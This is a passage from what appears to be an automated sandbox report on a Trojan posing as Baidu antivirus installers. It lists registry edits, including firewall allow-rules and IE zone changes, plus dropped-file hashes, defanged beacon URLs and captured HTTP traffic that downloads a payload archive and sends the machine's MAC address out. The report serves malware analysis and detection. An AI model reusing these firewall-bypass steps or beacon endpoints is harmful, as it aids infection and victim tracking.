"Publisher" = "百度在线网络技术(北京)有限公司"

[HKCR\ieCommonPlugin.Implement\CurVer]
"(Default)" = "ieCommonPlugin.Implement.1"

[HKCR\Interface\{C7777CD6-0F43-49E4-B988-F62E3BA5130A}\TypeLib]
"Version" = "1.0"

[HKLM\SOFTWARE\MozillaPlugins\@baidu.com/BaidusdDetectNPPlugin]
"ProductName" = "BaiduSd"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\SOFTWARE\Baidu\BaiduSd]
"RtpFlag" = "273"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKCR\ieCommonPlugin.Implement\CLSID]
"(Default)" = "{36E6A19A-6C8C-4250-B42A-24B8D3514ABA}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f2-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Baidu\BaiduSd]
"InstallDir" = "%Program Files%\Baidu\BaiduSd"

[HKCR\CLSID\{36E6A19A-6C8C-4250-B42A-24B8D3514ABA}]
"(Default)" = "Implement Class"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\百度杀毒]
"DisplayIcon" = "%Program Files%\Baidu\BaiduSd\1.8.0.1255\app.ico"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKCR\Interface\{C7777CD6-0F43-49E4-B988-F62E3BA5130A}]
"(Default)" = "IImplement"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKCR\AppID\{6B4447CA-C33E-4E65-914D-C7B346D73F80}]
"(Default)" = "ieCommonPlugin"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "17 3F AB 9F 67 44 DF 80 AB D3 DE 7C 71 46 D4 68"

[HKLM\SOFTWARE\MozillaPlugins\@baidu.com/BaidusdDetectNPPlugin]
"Description" = "Baidusd detect NPAPI plugin"

[HKLM\System\CurrentControlSet\Control\CrashControl]
"CrashDumpEnabled" = "2"

[HKCR\TypeLib\{9A93865B-4314-47AE-8C4A-850748CCC6BF}\1.0\0\win32]
"(Default)" = "%Program Files%\Baidu\BaiduSd\1.8.0.1255\explugin\ieBaiduSDDetectPlug.dll"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\百度杀毒]
"DisplayName" = "百度杀毒1.8"

[HKLM\SOFTWARE\Baidu\BaiduSd]
"VirusTime" = "2013.11.28 0110"

[HKCR\ieCommonPlugin.Implement.1\CLSID]
"(Default)" = "{36E6A19A-6C8C-4250-B42A-24B8D3514ABA}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{773a730e-74fb-11e2-b597-000c293bdf2f}]
"BaseClass" = "Drive"

[HKCR\ieCommonPlugin.Implement.1]
"(Default)" = "Implement Class"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f5-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\TypeLib\{9A93865B-4314-47AE-8C4A-850748CCC6BF}\1.0]
"(Default)" = "ieCommonPlugin 1.0 Type Library"

[HKCR\Interface\{C7777CD6-0F43-49E4-B988-F62E3BA5130A}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\MozillaPlugins\@baidu.com/BaidusdDetectNPPlugin]
"Version" = "1.0.0.1"

[HKCR\CLSID\{36E6A19A-6C8C-4250-B42A-24B8D3514ABA}\TypeLib]
"(Default)" = "{9A93865B-4314-47AE-8C4A-850748CCC6BF}"

[HKLM\SOFTWARE\Baidu\BaiduSd]
"SupplyID" = "30241"

[HKCR\CLSID\{36E6A19A-6C8C-4250-B42A-24B8D3514ABA}\InprocServer32]
"ThreadingModel" = "Apartment"

The Trojan adds process executable file it works in to the list of trusted Windows Firewall applications:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%Documents and Settings%\%current user%\Local Settings\Temp\nslB3.tmp]
"F30241_s_0523.exe" = "%Documents and Settings%\%current user%\Local Settings\Temp\nslB3.tmp\F30241_s_0523.exe:*:Enabled:百度杀毒安装程序"

Adds a rule to the firewall Windows which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Documents and Settings%\%current user%\Local Settings\Temp\nslB3.tmp]
"F30241_s_0523.exe" = "%Documents and Settings%\%current user%\Local Settings\Temp\nslB3.tmp\F30241_s_0523.exe:*:Enabled:百度杀毒安装程序"

The process BDDownloader.exe:3960 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C9 C7 46 5A 83 2C E7 A3 24 1B D3 4C C9 5D 14 FF"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f3-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{773a730e-74fb-11e2-b597-000c293bdf2f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f2-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\c:\program files\common files\baidu\bddownload\106]
"bddownloader.exe" = "百度高速下载引擎"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f5-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The process BDDownloader.exe:3520 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B3 DA 72 1B 22 28 1E 5E 2B 56 6F C4 2C 8D 96 BF"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{773a730e-74fb-11e2-b597-000c293bdf2f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f3-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f5-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f2-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

The process regsvr32.exe:1936 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D3 F5 9B 7E D3 14 83 24 55 64 B9 1D 36 A3 6B 5F"

[HKCR\Interface\{6B3732AA-F6D4-4F16-9E22-49EDC52C9514}]
"(Default)" = "IDownloader_2"

[HKCR\CLSID\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\InProcServer32]
"ThreadingModel" = "Both"

[HKCR\CLSID\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}]
"(Default)" = "PSFactoryBuffer"

[HKCR\Interface\{6B3732AA-F6D4-4F16-9E22-49EDC52C9514}\ProxyStubClsid32]
"(Default)" = "{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}"

[HKCR\CLSID\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\InProcServer32]
"(Default)" = "c:\program files\common files\baidu\bddownload\106\bdcomproxy.dll"

[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}]
"(Default)" = "IDownloader"

[HKCR\Interface\{6B3732AA-F6D4-4F16-9E22-49EDC52C9514}\NumMethods]
"(Default)" = "6"

[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\NumMethods]
"(Default)" = "15"

[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\ProxyStubClsid32]
"(Default)" = "{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}"

The process BDKVWsc.exe:2740 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BD DA 5F 44 6E 16 F5 01 45 18 33 CC BF 15 4C BE"

The process RegSvr32.exe:468 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F5 C5 CA 1D 65 BA 25 69 A1 06 DA 4B C7 77 22 6F"

The process RegSvr32.exe:3168 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCR\TypeLib\{45D1EEF3-7713-48FA-B7A5-B77229C7D330}\1.0]
"(Default)" = "BDShellExt 1.0 Type Library"

[HKCR\BDShellExt.BDShellExtMenu\CurVer]
"(Default)" = "BDShellExt.BDShellExtMenu.1"

[HKCR\Interface\{0C5C9741-79A4-4A5F-A9B3-9E686CFF879B}\NumMethods]
"(Default)" = "3"

[HKCR\Interface\{0C5C9741-79A4-4A5F-A9B3-9E686CFF879B}]
"(Default)" = "IBDShellExtMenu"

[HKCR\Interface\{0C5C9741-79A4-4A5F-A9B3-9E686CFF879B}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\TypeLib\{45D1EEF3-7713-48FA-B7A5-B77229C7D330}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\CLSID\{0C5C9741-79A4-4A5F-A9B3-9E686CFF879B}\InProcServer32]
"(Default)" = "%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDShellExt.dll"

[HKCR\BDShellExt.BDShellExtMenu.1]
"(Default)" = "BDShellExtMenu Class"

[HKCR\BDShellExt.BDShellExtMenu]
"(Default)" = "BDShellExtMenu Class"

[HKCR\CLSID\{00890530-6A9F-4be2-B1BB-73F01E2BB986}\InprocServer32]
"(Default)" = "%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDShellExt.dll"

[HKCR\BDShellExt.BDShellExtMenu.1\CLSID]
"(Default)" = "{00890530-6A9F-4be2-B1BB-73F01E2BB986}"

[HKCR\lnkfile\shellex\ContextMenuHandlers\BDShellExt]
"(Default)" = "{00890530-6A9F-4be2-B1BB-73F01E2BB986}"

[HKCR\AppID\BDShellExt.DLL]
"AppID" = "{FBE0E29B-01DB-4876-B147-46F5AABA6823}"

[HKCR\Interface\{0C5C9741-79A4-4A5F-A9B3-9E686CFF879B}\TypeLib]
"Version" = "1.0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved]
"{00890530-6A9F-4be2-B1BB-73F01E2BB986}" = "BDShellExtMenu Class"

[HKCR\BDShellExt.BDShellExtMenu\CLSID]
"(Default)" = "{00890530-6A9F-4be2-B1BB-73F01E2BB986}"

[HKCR\CLSID\{00890530-6A9F-4be2-B1BB-73F01E2BB986}\TypeLib]
"(Default)" = "{45D1EEF3-7713-48fa-B7A5-B77229C7D330}"

[HKCR\Interface\{0C5C9741-79A4-4A5F-A9B3-9E686CFF879B}\TypeLib]
"(Default)" = "{45D1EEF3-7713-48FA-B7A5-B77229C7D330}"

[HKCR\CLSID\{00890530-6A9F-4be2-B1BB-73F01E2BB986}\VersionIndependentProgID]
"(Default)" = "BDShellExt.BDShellExtMenu"

[HKCR\CLSID\{00890530-6A9F-4be2-B1BB-73F01E2BB986}\ProgID]
"(Default)" = "BDShellExt.BDShellExtMenu.1"

[HKCR\AllFilesystemObjects\shellex\ContextMenuHandlers\BDShellExt]
"(Default)" = "{00890530-6A9F-4be2-B1BB-73F01E2BB986}"

[HKCR\CLSID\{0C5C9741-79A4-4A5F-A9B3-9E686CFF879B}]
"(Default)" = "PSFactoryBuffer"

[HKCR\AppID\{FBE0E29B-01DB-4876-B147-46F5AABA6823}]
"(Default)" = "BDShellExt"

[HKCR\TypeLib\{45D1EEF3-7713-48FA-B7A5-B77229C7D330}\1.0\0\win32]
"(Default)" = "%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDShellExt.dll"

[HKCR\CLSID\{00890530-6A9F-4be2-B1BB-73F01E2BB986}]
"AppID" = "{FBE0E29B-01DB-4876-B147-46F5AABA6823}"

[HKCR\CLSID\{0C5C9741-79A4-4A5F-A9B3-9E686CFF879B}\InProcServer32]
"ThreadingModel" = "Both"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "ED E9 F2 00 36 F2 B8 8E 59 ED 84 17 F9 EC D1 D6"

[HKCR\Folder\shellex\ContextMenuHandlers\BDShellExt]
"(Default)" = "{00890530-6A9F-4be2-B1BB-73F01E2BB986}"

[HKCR\CLSID\{00890530-6A9F-4be2-B1BB-73F01E2BB986}]
"(Default)" = "BDShellExtMenu Class"

[HKCR\TypeLib\{45D1EEF3-7713-48FA-B7A5-B77229C7D330}\1.0\HELPDIR]
"(Default)" = ""

[HKCR\Interface\{0C5C9741-79A4-4A5F-A9B3-9E686CFF879B}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CLSID\{00890530-6A9F-4be2-B1BB-73F01E2BB986}\InprocServer32]
"ThreadingModel" = "Apartment"

The process ionrkf_70688.exe:280 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "99 7F 2F A3 BD E2 12 0E D1 DF 65 46 29 CE AA DB"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f3-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{773a730e-74fb-11e2-b597-000c293bdf2f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f2-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\metnsd\clsid]
"SequenceID" = "99 A8 94 38 5A 89 70 4A AB 26 83 6B BF 13 26 02"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f5-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

Adds a rule to the firewall Windows which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Documents and Settings%\%current user%\Local Settings\Temp\nslB3.tmp]
"ionrkf_70688.exe" = "%Documents and Settings%\%current user%\Local Settings\Temp\nslB3.tmp\ionrkf_70688.exe:*:Enabled:百度卫士在线安装程序"

The Trojan adds process executable file it works in to the list of trusted Windows Firewall applications:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%Documents and Settings%\%current user%\Local Settings\Temp\nslB3.tmp]
"ionrkf_70688.exe" = "%Documents and Settings%\%current user%\Local Settings\Temp\nslB3.tmp\ionrkf_70688.exe:*:Enabled:百度卫士在线安装程序"

Dropped PE files

MD5 File path
a7d710e78711d5ab90e4792763241754 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nslB3.tmp\Md5dll.dll
00a0194c20ee912257df53bfe258ee4a c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nslB3.tmp\System.dll
e2b78c96162ad8c36a623e6a4ba1c216 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nslB3.tmp\bind.dll
3a5ed71aa9c6846d95d57235c4c443d7 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nslB3.tmp\xID.dll
8f87437f10cd1ae1d2e8a16c74edb3bd c:\Program Files\shandian\bin\sdad.exe
14748083682ed1f9ef1dc28bb609050a c:\Program Files\shandian\bin\shandian.exe
e05c408b45877ca878fc12a27d016568 c:\Program Files\shandian\shandian.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 23628 24064 4.46394 856b32eb77dfd6fb67f21d6543272da5
.rdata 28672 4764 5120 3.4982 dc77f8a1e6985a4361c55642680ddb4f
.data 36864 154712 1024 3.3278 7922d4ce117d7d5b3ac2cffe4b0b5e4f
.ndata 192512 49152 0 0 d41d8cd98f00b204e9800998ecf8427e
.rsrc 241664 145240 145408 4.71338 3c323dbf8f30feffcb5487397c96eb8f

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://stat.fjmjm.com.aqb.so/stat/?v=1&ac=setup&name=%original file name%.exe&mac=00-0C-29-3B-DF-2F&md5=cd1bf5c8668f31abd345f75407391ed8 182.118.38.221
hxxp://down.qicc-md.org/F30241_s_0523.rar 61.160.224.228
hxxp://stat.fjmjm.com.aqb.so/stat/?ac=stat&name=%original file name%.exe&mac=00-0C-29-3B-DF-2F&md5=cd1bf5c8668f31abd345f75407391ed8 182.118.38.221
hxxp://stat.fjmjm.com.aqb.so/web/PopWinParam.asp?d=2014419&mainver=1.0.0&popver=1.0.0&xmlver=20131020010000 182.118.38.221
hxxp://0d5a84904f02c392.dnspao.com/
hxxp://www.fjmjm.com.aqb.so/web/welcome_cn.htm?ver=2.4.1.9&guid=a64f77031449b9089cdde8cb20ce31cb68f4c3c5f08e420ebe5bab809d8443091403989454&lastver= 182.118.38.217
hxxp://proxy.sogou.com/?22014
hxxp://www.fjmjm.com.aqb.so/web/newioage.css 182.118.38.217
hxxp://www.mdtxw.org.he2.aqb.so/miniindex/ 112.124.102.171
hxxp://www.mdtxw.org.he2.aqb.so/miniindex/inc/stylemini.css 112.124.102.171
hxxp://www.mdtxw.org.he2.aqb.so/miniindex/inc/jquery-1.7.2.min.js 112.124.102.171
hxxp://www.mdtxw.org.he2.aqb.so/miniindex/tj.js 112.124.102.171
hxxp://www.fjmjm.com/web/welcome_cn.htm?ver=2.4.1.9&guid=a64f77031449b9089cdde8cb20ce31cb68f4c3c5f08e420ebe5bab809d8443091403989454&lastver= 182.118.38.217
hxxp://www.mdtxw.org/miniindex/inc/jquery-1.7.2.min.js 112.124.102.171
hxxp://stat.fjmjm.com/stat/?ac=stat&name=%original file name%.exe&mac=00-0C-29-3B-DF-2F&md5=cd1bf5c8668f31abd345f75407391ed8 182.118.38.221
hxxp://www.jlbnh.com/ 61.160.224.185
hxxp://stat.fjmjm.com/web/PopWinParam.asp?d=2014419&mainver=1.0.0&popver=1.0.0&xmlver=20131020010000 182.118.38.221
hxxp://www.mdtxw.org/miniindex/ 112.124.102.171
hxxp://123.sogou.com/?22014 220.181.124.2
hxxp://www.mdtxw.org/miniindex/tj.js 112.124.102.171
hxxp://stat.fjmjm.com/stat/?v=1&ac=setup&name=%original file name%.exe&mac=00-0C-29-3B-DF-2F&md5=cd1bf5c8668f31abd345f75407391ed8 182.118.38.221
hxxp://www.fjmjm.com/web/newioage.css 182.118.38.217
hxxp://www.mdtxw.org/miniindex/inc/stylemini.css 112.124.102.171


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

SURICATA STREAM ESTABLISHED packet out of window
SURICATA STREAM Packet with invalid ack
SURICATA STREAM ESTABLISHED invalid ack

Traffic

GET /stat/?ac=stat&name=%original file name%.exe&mac=00-0C-29-3B-DF-2F&md5=cd1bf5c8668f31abd345f75407391ed8 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E)
Host: stat.fjmjm.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: ASERVER/1.2.9-3
Date: Sun, 29 Jun 2014 01:59:24 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
Who: ShanIE
Set-Cookie: ASPSESSIONIDCASQABDQ=EJOBAFCDHIFHAFHJDHLMNMOC; path=/
Cache-control: private
X-Powered-By-Anquanbao: MISS from uni-zz-dl-if1



GET /F30241_s_0523.rar HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Host: down.qicc-md.org
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.4.3.6
Date: Sun, 29 Jun 2014 01:59:20 GMT
Content-Type: application/octet-stream
Content-Length: 12269032
Connection: keep-alive
X-Powered-By-360WZB: wangzhan.360.cn
Last-Modified: Sun, 25 May 2014 10:57:46 GMT
Accept-Ranges: bytes
ETag: "071029878cf1:735"
[email protected]...........................
..!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8
...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8.......
.PE..L.....GO.................p.......B...9............@..............
.............&.....O*;*[email protected].........$
..h..............H#...................................................
........................................text....o.......p.............
..... ..`.rdata...*.......,...t..............@[email protected]....~...........
...............@....ndata...P...0...........................rsrc....h.
...$..j..................@[email protected]........%[email protected].
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U....\.}..t .}.F.E.u..H
[email protected][email protected]...
..@..}[email protected]... M..........M........E...FQ.....NU
..M.......M...VT..U........FP..E...............E.P.M...H.@..E..P.E..E.
[email protected]}[email protected].}.j.W.E......E.....
[email protected][email protected][email protected] [email protected].
u.....@._^3.[.....L$...-G...i. @...T.....tUVW.q.3.;5.-G.sD..i. @...D..
S.....t.G.....t...O..t .....u...3....3...F. @..;5.-G.r.[_^...U..QQ
<<< skipped >>>


GET /miniindex/ HTTP/1.1
User-Agent: hello crazyk
Host: VVV.mdtxw.org


HTTP/1.1 200 OK
Content-Length: 10190
Content-Type: text/html
Content-Location: hXXp://VVV.mdtxw.org/miniindex/index.html
Last-Modified: Thu, 10 Apr 2014 18:26:17 GMT
Accept-Ranges: bytes
ETag: "72b0ee5cea54cf1:43f"
Server: Microsoft-IIS/6.0
Who: ShanIE
Date: Sun, 29 Jun 2014 01:59:47 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "htt
p://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xm
lns="hXXp://VVV.w3.org/1999/xhtml">...<head>....<meta http
-equiv="Content-Type" content="text/html; charset=gb2312">....<m
eta http-equiv="Cache-Control" content="no-cache">....<meta name
="robots" content="noindex, nofollow,nosnippet,noarchive,noodp">...
.<title>..........</title>....<link href="inc/stylemini
.css" rel="stylesheet" type="text/css">....<script src="inc/jque
ry-1.7.2.min.js" type="text/javascript"></script>....<base
 target="_blank">..<script type="text/javascript"> ..<!-- 
..//..........//document.oncontextmenu=function(e){return false;}..//.
...........var cusi=0;..var tiaozuan=1;..var timer;..//..............v
ar bq_array = new Array();..//........,....id,........url,............
(1....,..............class) ......url ......bq_array.push(["....","0",
"","0","","0"]);..bq_array.push(["....","105","hXXp://VVV.mdtxw.org/mi
ni/?r=","0","xinwen.htm","0"]);..bq_array.push(["....","101","hXXp://w
ww.mdtxw.org/mini/?r=","0","nvxing_509_366.htm","0"]);..bq_array.push(
["....","102","hXXp://VVV.mdtxw.org/mini/?r=","0","lieqi_509_366.htm",
"0"]);..bq_array.push(["....","100","hXXp://VVV.mdtxw.org/mini/?r=","0
","shehui_509_366.htm","0"]);..bq_array.push(["....","120","hXXp://www
.mdtxw.org/mini/?r=","0","jiankang_509_366.htm","0"]);..bq_array.push(
["....","130","hXXp://VVV.mdtxw.org/mini/?r=","0","meinv.htm","0"]
<<< skipped >>>


GET /miniindex/ HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E)
Host: VVV.mdtxw.org
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Length: 10190
Content-Type: text/html
Content-Location: hXXp://VVV.mdtxw.org/miniindex/index.html
Last-Modified: Thu, 10 Apr 2014 18:26:17 GMT
Accept-Ranges: bytes
ETag: "72b0ee5cea54cf1:43f"
Server: Microsoft-IIS/6.0
Who: ShanIE
Date: Sun, 29 Jun 2014 01:59:48 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "htt
p://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xm
lns="hXXp://VVV.w3.org/1999/xhtml">...<head>....<meta http
-equiv="Content-Type" content="text/html; charset=gb2312">....<m
eta http-equiv="Cache-Control" content="no-cache">....<meta name
="robots" content="noindex, nofollow,nosnippet,noarchive,noodp">...
.<title>..........</title>....<link href="inc/stylemini
.css" rel="stylesheet" type="text/css">....<script src="inc/jque
ry-1.7.2.min.js" type="text/javascript"></script>....<base
 target="_blank">..<script type="text/javascript"> ..<!-- 
..//..........//document.oncontextmenu=function(e){return false;}..//.
...........var cusi=0;..var tiaozuan=1;..var timer;..//..............v
ar bq_array = new Array();..//........,....id,........url,............
(1....,..............class) ......url ......bq_array.push(["....","0",
"","0","","0"]);..bq_array.push(["....","105","hXXp://VVV.mdtxw.org/mi
ni/?r=","0","xinwen.htm","0"]);..bq_array.push(["....","101","hXXp://w
ww.mdtxw.org/mini/?r=","0","nvxing_509_366.htm","0"]);..bq_array.push(
["....","102","hXXp://VVV.mdtxw.org/mini/?r=","0","lieqi_509_366.htm",
"0"]);..bq_array.push(["....","100","hXXp://VVV.mdtxw.org/mini/?r=","0
","shehui_509_366.htm","0"]);..bq_array.push(["....","120","hXXp://www
.mdtxw.org/mini/?r=","0","jiankang_509_366.htm","0"]);..bq_array.push(
["....","130","hXXp://VVV.mdtxw.org/mini/?r=","0","meinv.htm","0"]
<<< skipped >>>

GET /miniindex/tj.js HTTP/1.1


Accept: */*
Referer: hXXp://VVV.mdtxw.org/miniindex/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E)
Host: VVV.mdtxw.org
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Length: 279
Content-Type: application/x-javascript
Last-Modified: Thu, 10 Apr 2014 18:44:12 GMT
Accept-Ranges: bytes
ETag: "191fdfddec54cf1:43f"
Server: Microsoft-IIS/6.0
Who: ShanIE
Date: Sun, 29 Jun 2014 01:59:48 GMT
var cnzz_protocol = (("https:" == document.location.protocol) ? " http
s://" : " hXXp://");document.write(unescape(""));.
.



GET /F30241_s_0523.rar HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Host: down.qicc-md.org
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.4.3.6
Date: Sun, 29 Jun 2014 01:59:19 GMT
Content-Type: application/octet-stream
Content-Length: 12269032
Connection: keep-alive
X-Powered-By-360WZB: wangzhan.360.cn
Last-Modified: Sun, 25 May 2014 10:57:46 GMT
Accept-Ranges: bytes
ETag: "071029878cf1:735"
[email protected]...........................
..!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8
